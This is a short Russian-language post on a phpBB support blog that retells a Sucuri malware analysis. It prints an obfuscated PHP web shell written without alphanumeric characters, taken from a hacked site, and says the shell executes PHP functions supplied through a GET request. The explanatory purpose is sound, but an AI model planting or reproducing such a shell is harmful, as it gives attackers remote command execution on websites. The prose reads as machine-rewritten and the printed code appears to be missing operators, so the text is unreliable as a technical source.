Главная
Блог разработчиков phpBB
 
+ 17 предустановленных модов
+ SEO-оптимизация форума
+ авторизация через соц. сети
+ защита от спама

PHP-шелл без цельного буквенно-цифрового символа

Anna | 31.05.2014 | нет комментариев

Вчера в блоге компании Sucuri возник любознательный вопрос: некоторый обладатель сайта, найдя его взломанным, был много удивлён, найдя дальнейший злонамеренный код; что именно он делает?

@$_[]=@! _; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((  $__) ($__   ))].=$_;
$_[]=  $__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__ $__)  $_[$__-$__]).($__ $__ $__) $_[$__-$__];
$_[$__ $__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__ $__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__ $__] .=($_[$__][$__ $__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__  $__] ;$_[@-_]($_[@! _] );

Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.

Один из программистов Sucuri Йорман Ариас (Yorman Arias) расположил код в больше удобочитаемом виде и облёк всякую строку кода в var_dump(), Дабы увидеть её итог:

image

В выводе, применяя туманные фразы как бы «some boolean magic » и анализируя код, приходит к итогу, что призвание вредоноса — выполнение PHP-функций, тот, что передаются ему при помощи GET-запроса.

Технические подробности — тут.

Источник: programmingmaster.ru

Оставить комментарий
Форум phpBB, русская поддержка форума phpBB
Рейтинг@Mail.ru 2008 - 2017 © BB3x.ru - русская поддержка форума phpBB